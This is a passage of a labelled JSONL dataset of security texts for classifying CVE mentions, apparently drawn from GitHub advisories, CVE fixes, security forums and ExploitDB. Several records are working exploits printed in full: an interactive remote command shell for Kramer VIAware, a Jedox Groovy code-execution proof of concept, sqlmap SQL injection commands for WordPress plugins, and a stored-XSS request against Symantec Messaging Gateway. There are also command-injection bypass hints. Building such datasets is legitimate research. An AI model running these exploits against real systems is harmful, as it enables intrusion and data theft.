not about ports but about encrypted files and I need to look into them.", "source": "hackthebox", "timestamp": "2023-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "db2f9bd3bb673df7d35a", "text": "GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language\n\n[Severity: CRITICAL]\n\nGeoServer 2, in some configurations, allows remote attackers to execute arbitrary code via `java.lang.Runtime.getRuntime().exec` in `wps:LiteralData` within a `wps:Execute` request, as exploited in the wild in June 2023.\n\n## RCE in Jiffle\n\nThe Jiffle map algebra language, provided by jai-ext, allows efficiently execute map algebra over large images. A vulnerability [CVE-2022-24816](https://nvd.nist.gov/vuln/detail/CVE-2022-24816) has been recently found in Jiffle, that allows a Code Injection to be performed by properly crafting a Jiffle invocation.\n\nIn the case of GeoServer, the injection can be performed from a remote request.\n\n## Assessment\n\nGeoTools includes the Jiffle language as part of the `gt-process-raster-` module, applications using it should check whether it’s possible to provide a Jiffle script from remote, and if so, upgrade or remove the functionality (see also the GeoServer mitigation, below).\n\nThe issue is of particular interest for GeoServer users, as GeoServer embeds Jiffle in the base WAR package. Jiffle is available as a OGC function, for usage in SLD rendering transformations.\n\nThis allows for a Remote Code Execution in properly crafted OGC requests, as well as from the administration console, when editing SLD files.\n\n## Mitigations\n\nIn case you cannot upgrade at once, then the following mitigation is strongly recommended:\n\n1. Stop GeoServer\n2. Open the war file, get into `WEB-INF/lib` and remove the `janino-.jar`\n3. Restart GeoServer.\n\nThis effectively removes the Jiffle ability to compile scripts in Java code, from any of the potential attack vectors (Janino is the library used to turn the Java code generated from the Jiffle script, into executable bytecode).\n\nGeoServer should still work properly after the removal, but any attempt to use Jiffle will result in an exception.", "source": "github_advisory", "timestamp": "2023-06-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2302b6c33aa9e0548036", "text": "CVE: CVE-2022-35948\n\n[{'lang': 'en', 'value': \"undici is an HTTP/1.1 client, written from scratch for Node.js.`=< undici@5.8.0` users are vulnerable to _CRLF Injection_ on headers when using unsanitized input as request headers, more specifically, inside the `content-type` header. Example: ``` import { request } from 'undici' const unsanitizedContentTypeInput = 'application/json\\\\r\\\\n\\\\r\\\\nGET /foo2 HTTP/1.1' await request('http://localhost:3000, { method: 'GET', headers: { 'content-type': unsanitizedContentTypeInput }, }) ``` The above snippet will perform two requests in a single `request` API call: 1) `http://localhost:3000/` 2) `http://localhost:3000/foo2` This issue was patched in Undici v5.8.1. Sanitize input when sending content-type headers using user input as a workaround.\"}]\n\nFix commit: Merge pull request from GHSA-f772-66g8-q5h3", "source": "cvefixes", "timestamp": "2022-08-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "30e4efff14748c99eec5", "text": "wifite issue\n\ni use to run wifite before actually am a newbie i used to hack my own wifi for fun it used to crack well.But from few days i can’t crack the same wifi actually the process is running i mean all the 5 attacks but still can’t crack the same wifi password even tried deauthentication attack too no use.", "source": "parrotsec", "timestamp": "2023-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f1520280eba9173a0f5c", "text": "I’m new to this forum,but i would like to state the following: When there’s a good method/tool…will get burned by kiddies using Virustotal and others.", "source": "hackersploit", "timestamp": "2022-02-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "644aacce2e383e4f87fb", "text": "Htb ctf\n\nWhy does it say for CTF that every “public” CTF requires an input key? It wouldn’t make sense for it to be public if you require a key that needs to be given to you. Edit: I say “every” because I’m talking about all the ongoing and upcoming CTF.", "source": "hackthebox", "timestamp": "2023-04-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6f34ae99becc3c6d4562", "text": "Improper JWT Signature Validation in SAP Security Services Library \n\n[Severity: CRITICAL]\n\n### Impact\nSAP BTP Security Services Integration Library ([Java] cloud-security-services-integration-library) allows under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.\n\n### Patches\nUpgrade to patched version >= 2.17.0 or >= 3.3.0 \nWe always recommend to upgrade to the latest released version.\n\n### Workarounds\nNo workarounds\n\n### References\nhttps://www.cve.org/CVERecord?id=CVE-2023-50422\n", "source": "github_advisory", "timestamp": "2023-12-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ff4108ff70d7e76fbee2", "text": "Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)\n\n# Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)\n# Date: 28/03/2022\n# Exploit Author: sharkmoos & BallO\n# Vendor Homepage: https://www.kramerav.com/\n# Software Link: https://www.kramerav.com/us/product/viaware\n# Version: 2.5.0719.1034\n# Tested on: ViaWare Go (Windows 10)\n# CVE : CVE-2019-17124\n\nimport requests, sys, urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef adminLogin(s, host, username, password):\n headers = {\n \"Host\": f\"{host}\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"en-GB,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Origin\": f\"https://{host}\",\n \"Referer\": f\"https://{host}/admin/login.php\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Sec-Fetch-Dest\": \"document\",\n \"Sec-Fetch-Mode\": \"navigate\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Fetch-User\": \"?1\",\n \"Sec-Gpc\": \"1\",\n \"Te\": \"trailers\",\n \"Connection\": \"close\"\n }\n data = {\n \"txtUserId\": username,\n \"txtPwd\": password,\n \"btnOk\" :\"Login\"\n }\n response = s.post(f\"https://{host}/admin/login.php\", verify=False)\n if len(s.cookies) < 1:\n return False\n else:\n return True\n\n\ndef writeCommand(session, host, command):\n headers = {\n \"Host\": f\"{host}\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\",\n \"Accept\": \"text/html, */*\",\n \"Accept-Language\": \"en-GB,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Origin\": f\"https://{host}\",\n \"Referer\": f\"https://{host}/browseSystemFiles.php?path=C:\\Windows&icon=browser\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Gpc\": \"1\",\n \"Te\": \"trailers\",\n \"Connection\": \"close\"\n }\n data = {\n \"radioBtnVal\":f\"{command}\",\n \"associateFileName\": \"C:/tc/httpd/cgi-bin/exploit.cmd\"\n }\n session.post(f\"https://{host}/ajaxPages/writeBrowseFilePathAjax.php\", headers=headers, data=data)\n\n\ndef getResult(session, host):\n file = session.get(f\"https://{host}/cgi-bin/exploit.cmd\", verify=False)\n pageText = file.text\n if len(pageText) < 1:\n result = \"Command did not return a result\"\n else:\n result = pageText\n return result\n\n\n\ndef main(host, username=\"su\", password=\"supass\"):\n s = requests.Session()\n # comment this line to skip the login stage\n loggedIn = adminLogin(s, host, username, password)\n\n if not loggedIn:\n print(\"Could not successfully login as the admin\")\n sys.exit(1)\n else:\n pass\n\n command = \"\"\n while command != \"exit\":\n command = input(\"cmd:> \").strip()\n writeCommand(s, host, command)\n print(getResult(s, host))\n exit()\n\nif __name__ == \"__main__\":\n\n args = sys.argv\n numArgs = len(args)\n if numArgs < 2:\n print(f\"Run script in format:\\n\\n\\tpython3 {args[0]} target\\n\")\n print(f\"[Optional] Provide Admin Credentials\\n\\n\\tpython3 {args[0]} target su supass\")\n if numArgs == 2:\n main(args[1])\n if numArgs == 4:\n main(args[1], args[2], args[3])\n if numArgs > 4:\n print(f\"Run script in format:\\n\\n\\tpython3 {args[0]} target\\n\")\n print(f\"[Optional] Provide Admin Credentials\\n\\n\\tpython3 {args[0]} target su supass\")", "source": "exploitdb", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "55af3f24e50e437b4f44", "text": "[Business Logic Errors] CVE-2023-23914: HSTS ignored on multiple requests\n\ncurl's HSTS functionality fail when multiple URLs are requested serially.\n\nUsing its HSTS support, curl can be instructed to use HTTPS instead of using an insecure clear-text HTTP step even when HTTP is provided in the URL. This HSTS mechanism would however suprisingly be ignored by subsequent transfers when done on the same command line because the state would not be properly carried on.\n\n## Impact\n\nBypass intended security control.", "source": "hackerone", "timestamp": "2023-02-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4f70b59642aa7e524ee4", "text": "check other users! Some of them have some files that you might be able to see!", "source": "hackthebox", "timestamp": "2023-02-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1f5a9392a12915100aa5", "text": "This looks very handy, i’m going to have a play with this tomorrow.", "source": "hackthebox", "timestamp": "2022-05-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8e80a3724e0a38bd738a", "text": "CVE: CVE-2022-31081\n\n[{'lang': 'en', 'value': \"HTTP::Daemon is a simple http server class written in perl. Versions prior to 6.15 are subject to a vulnerability which could potentially be exploited to gain privileged access to APIs or poison intermediate caches. It is uncertain how large the risks are, most Perl based applications are served on top of Nginx or Apache, not on the `HTTP::Daemon`. This library is commonly used for local development and tests. Users are advised to update to resolve this issue. Users unable to upgrade may add additional request handling logic as a mitigation. After calling `my $rqst = $conn->get_request()` one could inspect the returned `HTTP::Request` object. Querying the 'Content-Length' (`my $cl = $rqst->header('Content-Length')`) will show any abnormalities that should be dealt with by a `400` response. Expected strings of 'Content-Length' SHOULD consist of either a single non-negative integer, or, a comma separated repetition of that number. (that is `42` or `42, 42, 42`). Anything else MUST be rejected.\"}]\n\nFix commit: Include reason in response body content", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6f351b10914856ddd7d7", "text": "Cross-site Scripting in Jenkins Dynamic Extended Choice Parameter Plugin\n\n[Severity: HIGH]\n\nJenkins Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier does not escape the name and description of Moded Extended Choice parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-06-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4ec93fb14f76163921f6", "text": "Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts\n\n# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts\n# Date: 28/04/2023\n# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl\n# Vendor Homepage: https://jedox.com\n# Version: Jedox 2020.2 (20.2.5) and older\n# CVE : CVE-2022-47876\n\n\nIntroduction\n=================\nJedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.\n\n\nWrite-Up\n=================\nSee [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.\n\n\nProof of Concept\n=================\n1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:\n\n\tdef sout = new StringBuilder(), serr = new StringBuilder()\n\tdef proc = 'whoami'.execute()\n\tproc.consumeProcessOutput(sout, serr)\n\tproc.waitForOrKill(10000)\n\tLOG.error(sout.toString());\n\tLOG.error(serr.toString());", "source": "exploitdb", "timestamp": "2023-05-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c2840f94ae1ded0e97b9", "text": "@bite-sized-privilege , the package that you mentioned (FatRat) isn’t part of Parrot Security by default . You may check their documentation for better understanding on how to make that work .", "source": "parrotsec", "timestamp": "2022-03-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e6eb9eb6fcaa05e4604b", "text": "CVE: CVE-2021-23495\n\n[{'lang': 'en', 'value': 'The package karma before 6.3.16 are vulnerable to Open Redirect due to missing validation of the return_url query parameter.'}]\n\nFix commit: fix(security): mitigate the \"Open Redirect Vulnerability\"", "source": "cvefixes", "timestamp": "2022-02-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9ed631f8c68753658459", "text": "Solved. Click on all buttons (Copy, Move). Find the right place (Can be at the start of the file) to put injection operators ( | || %0a). Bypass filters for c\"o\"m\"m\"a\"n\"d and filtered characters . Find the good syntax to read the flag Message me if you need hint", "source": "hackthebox", "timestamp": "2023-02-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "496114806dcc2d7e9e1b", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Internet Explorer 9, ChakraCore, Internet Explorer 11, Microsoft Edge, Internet Explorer 10. This CVE ID is unique from CVE-2018-0945, CVE-2018-0946, CVE-2018-0951, CVE-2018-0953, CVE-2018-0955, CVE-2018-1022, CVE-2018-8114, CVE-2018-8122, CVE-2018-8128, CVE-2018-8137, CVE-2018-8139.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "958e12c156102c86a6d5", "text": "Yeah car hacking is definitely one of the more challenging spaces. I guess it comes down to what your goals are. What you research for learning how to exploit key-fobs would entirely different from something like modify the ECU’s performance maps. CAN Bus would be a good place to start. The tools will make more sense of you at least have a basic understanding of the underlying protocol running on cars’", "source": "parrotsec", "timestamp": "2023-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7a186410d2d30a76b363", "text": "WP AutoComplete 1.0.4 - Unauthenticated SQLi\n\n# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi\n# Date: 30/06/2023\n# Exploit Author: Matin nouriyan (matitanium)\n# Version: <= 1.0.4\n# CVE: CVE-2022-4297\nVendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/\n# Tested on: Kali linux\n\n---------------------------------------\n\n\nThe WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise\nand escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,\nleading to an unauthenticated SQL injection\n\n--------------------------------------\n\nHow to Reproduce this Vulnerability:\n\n1. Install WP AutoComplete <= 1.0.4\n2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests\n3. Find requests belong to WP AutoComplete like step 5\n4. Start sqlmap and exploit\n5. python3 sqlmap.py -u \"https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]\" --random-agent --level=5 --risk=2 -p q", "source": "exploitdb", "timestamp": "2023-07-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e695648c0c8e36069251", "text": "Initially I did it a bit different: mov rcx, 14 mov rdx, rsp loopStack: mov rdi, [rdx] xor rdi, rbx add rdx, 8 loop loopStack but it did not work. I see some kind of new shell, but typing any letter throws an error. Then I tried what @XSSDoctor suggested and it gave me the same HEX line (‘4831…0f05’), so it’s still does not work. Could anyone please help? Maybe there’s something special in how you feed this line to ‘loader.py’?", "source": "hackthebox", "timestamp": "2023-06-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a7de11ce21d61a07043c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows remote code execution, due to how the Chakra scripting engine handles objects in memory, aka \"Chakra Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2018-0872, CVE-2018-0873, CVE-2018-0874, CVE-2018-0930, CVE-2018-0933, CVE-2018-0934, CVE-2018-0936, and CVE-2018-0937.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ffeff8fdcfce36928578", "text": "Potential leak of NuGet.org API key\n\n[Severity: MEDIUM]\n\n### Description \n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 6.0 and .NET Core 3.1, NuGet (NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat version range from 3.5.0 to 6.2.0). This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in .NET 6.0, .NET Core 3.1, and NuGet (NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat version range from 3.5.0 to 6.2.0) where a nuget.org api key could leak due to an incorrect comparison with a server url.\n\n### Affected software \n\n#### NuGet & NuGet Packages\n\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 6.2.0 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 6.0.1 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 5.11.1 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 5.9.1 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 5.7.1 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 4.9.4 version or earlier.\n\n#### .NET SDK(s)\n\n- Any .NET 6.0 application running on .NET 6.0.5 or earlier.\n- Any .NET 3.1 application running on .NET Core 3.1.25 or earlier.\n\n### Patches \n\n- If you're using NuGet.exe 6.2.0 or lower, you should download and install 6.2.1 from https://dist.nuget.org/win-x86-commandline/v6.2.1/nuget.exe. \n\n- If you're using NuGet.exe 6.0.1 or lower, you should download and install 6.0.2 from https://dist.nuget.org/win-x86-commandline/v6.0.2/nuget.exe. \n\n- If you're using NuGet.exe 5.11.1 or lower, you should download and install 5.11.2 from https://dist.nuget.org/win-x86-commandline/v5.11.2/nuget.exe. \n\n- If you're using NuGet.exe 5.9.1 or lower, you should download and install 5.9.2 from https://dist.nuget.org/win-x86-commandline/v5.9.2/nuget.exe. \n\n- If you're using NuGet.exe 5.7.1 or lower, you should download and install 5.7.2 from https://dist.nuget.org/win-x86-commandline/v4.7.2/nuget.exe. \n\n- If you're using NuGet.exe 4.9.4 or lower, you should download and install 4.9.5 from https://dist.nuget.org/win-x86-commandline/v4.9.5/nuget.exe. \n\n- If you're using .NET Core 6.0, you should download and install Runtime 6.0.6 or SDK 6.0.106 (for Visual Studio 2022 v17.0) or SDK 6.0.301 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. \n\n- If you're using .NET Core 3.1, you should download and install Runtime 3.1.26 or SDK 3.1.420 (for Visual Studio 2019 v16.9 or Visual Studio 2011 16.11 or Visual Studio 2022 17.0 or Visual Studio 2022 17.1 ) from https://dotnet.microsoft.com/download/dotnet-core/3.1 \n\n.NET 6.0 and .NET Core 3.1 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. \n\n### Other Details \n\nAnnouncement for this issue can be found at https://github.com/NuGet/Announcements/issues/62\n \nMSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30184", "source": "github_advisory", "timestamp": "2022-06-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8828b3fea810e510ca7d", "text": "Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)\n\n# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)\n# Exploit Author: omurugur\n# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117\n# Version: 10.7.4-10.7.13\n# Tested on: [relevant os]\n# CVE : CVE-2022-25630\n# Author Web: https://www.justsecnow.com\n# Author Social: @omurugurrr\n\n\nAn authenticated user can embed malicious content with XSS into the admin\ngroup policy page.\n\nExample payload\n\n*\"/>*\n\n\nPOST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo\nHTTP/1.1\nHost: X.X.X.X\nCookie: JSESSIONID=xxxxx\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)\nGecko/20100101 Firefox/99.0\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 652\nOrigin: https://x.x.x.x\nReferer:\nhttps://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\nTe: trailers\nConnection: close\n\npageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000\n\n\nRegards,\n\nOmur UGUR", "source": "exploitdb", "timestamp": "2023-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8b48959e83c09fc99448", "text": "@DANGERLORD , you may also try Parrot OS’s default installed tool “Take Screenshot” (Round disc icon in Menu) to take screenshots easily.", "source": "parrotsec", "timestamp": "2022-02-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d21d31c71406b43b5eef", "text": "Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)\n\n# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)\n# Date 30.01.2022\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/\n# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip\n# Version: <= 2.0.2\n# Tested on: Ubuntu 20.04\n# CVE: CVE-2015-9323\n# CWE: CWE-89\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md\n\n'''\nDescription:\nThe 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.\n'''\n\nbanner = '''\n\n .o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b.\nd8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D\n8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY'\n8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b.\nY8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. db 8D\n `Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P'\n\n [+] 404 to 301 - SQL-Injection\n [@] Developed by Ron Jost (Hacker5preme)\n\n'''\nprint(banner)\n\nimport argparse\nimport os\nimport requests\nfrom datetime import datetime\nimport json\n\n# User-Input:\nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nwp_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\nprint('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))\n\n\n# Authentication:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'\ncheck = session.get(auth_url)\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Log In',\n 'testcookie': '1'\n}\nauth = session.post(auth_url, headers=header, data=body)\n\n# SQL-Injection (Exploit):\n\n# Generate payload for sqlmap\nprint ('[+] Payload for sqlmap exploitation:')\ncookies_session = session.cookies.get_dict()\ncookie = json.dumps(cookies_session)\ncookie = cookie.replace('\"}','')\ncookie = cookie.replace('{\"', '')\ncookie = cookie.replace('\"', '')\ncookie = cookie.replace(\" \", '')\ncookie = cookie.replace(\":\", '=')\ncookie = cookie.replace(',', '; ')\n\nexploit_url = r'sqlmap -u \"http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1\"'\nexploit_risk = ' --level 2 --risk 2'\nexploit_cookie = r' --cookie=\"' + cookie + r'\" '\n\nprint(' Sqlmap options:')\nprint(' -a, --all Retrieve everything')\nprint(' -b, --banner Retrieve DBMS banner')\nprint(' --current-user Retrieve DBMS current user')\nprint(' --current-db Retrieve DBMS current database')\nprint(' --passwords Enumerate DBMS users password hashes')\nprint(' --tables Enumerate DBMS database tables')\nprint(' --columns Enumerate DBMS database table column')\nprint(' --schema Enumerate DBMS schema')\nprint(' --dump ", "source": "exploitdb", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e3299be2ee8bf4b9582a", "text": "A lot. Google is yr friend they say. Forbes Microsoft Confirms Seven Critical Windows 10 Vulnerabilities, And Attackers... Microsoft confirms a total of seven critical Windows 10 security vulnerabilities and two 'zero-days' that are being actively exploited cvedetails.com Microsoft Windows 10 : CVE security vulnerabilities, versions and detailed... Microsoft Windows 10 security vulnerabilities, exploits, metasploit modules, vulnerability statistics and list of versions etc…", "source": "hackersploit", "timestamp": "2022-08-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "92f4941bcf95011c8915", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in Microsoft Edge in the way that the Chakra JavaScript engine renders when handling objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability.\" This CVE ID is unique from CVE-2017-0224, CVE-2017-0228, CVE-2017-0229, CVE-2017-0230, CVE-2017-0235, CVE-2017-0236, and CVE-2017-0238.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9e49c54957b90b8544b9", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7c2d788211df177f0cf7", "text": "Microsoft Security Advisory CVE-2023-36793: .NET Remote Code Execution Vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-36793: .NET Remote Code Execution Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in Microsoft.DiaSymReader.Native.amd64.dll when reading a corrupted PDB file which may lead to remote code execution. This issue only affects Windows systems.\n\n**Note:** The vulnerabilities 